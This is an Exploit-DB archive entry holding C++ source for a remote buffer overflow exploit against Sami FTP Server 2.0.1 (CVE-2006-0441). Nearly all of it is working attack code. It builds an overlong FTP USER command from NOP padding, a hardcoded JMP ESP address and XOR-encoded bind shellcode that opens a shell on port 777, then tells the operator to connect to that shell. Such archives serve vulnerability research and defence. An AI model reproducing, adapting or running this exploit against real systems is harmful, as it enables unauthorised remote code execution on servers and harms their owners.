Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit cpp

2006-01-31T00:00:00
ID EDB-ID:1462
Type exploitdb
Reporter HolyGhost
Modified 2006-01-31T00:00:00

Description

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp). CVE-2006-0441. Remote exploit for windows platform

                                        
                                            // Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib' 
#pragma comment(lib, "ws2_32")

char MyShellCode[] =       // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
                        "\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x98\x77\xF3\x93"
"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\xAD\x16\x71\x09"
"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x18\x75\x09\x98"
"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\xCE\xDE\xCE\xDE"
"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\x9A\x90\x10"
"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x8D\xCE\xCF\xCA"
"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3"
"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10"
"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\xDD\xBD\x89\xCD"
"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\xC8\x66\xCC\xA9"
"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\xCE\x66\xCC\x95"
"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD"
"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x7A\xAB\xD0\x12"
"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\xED\x9E\x58\x56"
"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x98\x72"
"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x98\x71\x72\x9B"
"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";

static char PayLoad[1329];  

int IP;                     
int Port;                   
int szNOP1, szNOP2;         
int Nop; 

// Jump ESP by library User32 on Win2000 SP4 fr..
char JmpESP[] = "\x0C\xED\xE3\x77";
// Flag ID server Sami FTP.
char TargetFlag[] = "220-\r\n220 Features p a .";
char RecvBuff[200];

void usage(){
  cout<<" "<<endl;
  cout<<"USAGE : ThisAppz [Target IP] [Port to connect FTP]"  <<endl;
  cout<<"If a port isnt specified, default port will 21."    <<endl;
  cout<<"Without IP, the Xploit run in local mode [127.0.0.1]"<<endl;
  cout<<" "<<endl;
  return;}

void Info(){
  cout<<" "<<endl;
  cout<<" ============================================== v1.0 =="<<endl;
  cout<<" ====== Sami FTP Remote Buffer Overflow Exploit  ======"<<endl;
  cout<<" ================== Coded by HolyGhost ================"<<endl;
  cout<<" ====== Distributed for educational purposes only ====="<<endl;
  cout<<" ================== StormyTeam@free.fr ================"<<endl;
  cout<<" ======================================================"<<endl;
  cout<<" "<<endl;}

int main(int argc,char *argv[]){

Info();
if ( ( argc > 3 ) ){usage();return -1;} 

if( argc > 1 ){ 
  cout<<"argv[1]"<<"\t"<<argv[1]<<endl;
  IP = htonl( inet_addr( argv[1] ) );}
else{ 
  cout<<"Local test mode : 127.0.0.1"<<endl;
  IP = htonl( inet_addr( "127.0.0.1" ) );}

if( argc == 3 ){
  cout<<"argv[2]"<<"\t"<<argv[2]<<endl;
  Port = atoi( argv[2] );}
else{
  cout<<"Port by default : 21"<<endl;
  Port = 21;}

WSADATA wsadata;

if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
  cout<<"[-] WSAStartup error. Bye!"<<endl;
  return -1;}

SOCKET sck;
fd_set mask;              
struct timeval timeout;
struct sockaddr_in server;

sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.

if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
 
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );

timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );

switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
  case -1:{ // Problem! 
    cout<<"[-] Select() error. Bye!"<<endl;
    closesocket( sck );
	return -1;}

  case 0:{ // Problem!
	cout<<"[-] Connect() error. Bye!"<<endl;
	closesocket( sck );
	return -1;}

  default: 
  if(FD_ISSET( sck, &mask ) ){
    recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID.

    cout<<"[+] Connected, checking the server for flag..."<<endl;
	Sleep( 500 );
	
    if ( !strstr( RecvBuff, TargetFlag ) ){
      cout<<"[-] This is not a valid flag from target! Bye."<<endl;
	  return -1;} // Bye!
	cout<<RecvBuff;

    Sleep( 1000 ); 
    cout<<"[+] Connected, constructing the PayLoad..."<<endl;
   
    szNOP1 = 219; // First padding.
	szNOP2 = 720; // Second padding. 
    // Initialise le Buffer PayLoad NULL.
    memset( PayLoad, NULL, sizeof( PayLoad ) );
    strcat( PayLoad, "USER " );     // Command User.
    // First padding.
    for( Nop = 0; Nop < szNOP1; Nop++ ){
	  strcat( PayLoad, "\x90" );}
    // New EIP register.
	strcat( PayLoad, JmpESP );
    // Second Padding.
    for( Nop = 0; Nop < szNOP2; Nop++ ){
	  strcat( PayLoad, "\x90" );}
    strcat( PayLoad, MyShellCode );
    strcat( PayLoad, "\x0D\x0A" );
    // Send fully PayLoad.
    if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
	  cout<<"[-] Sending error, the server prolly rebooted."<<endl;
	  return -1;}

    Sleep( 1000 ); 

    cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
    cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
    return 0;
  }
}

closesocket( sck );
WSACleanup();
return 0; // Bye!

}
// Fully PayLoad description (1329 Bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [\r\n]
// 5        219             4      720             379         2

// milw0rm.com [2006-01-31]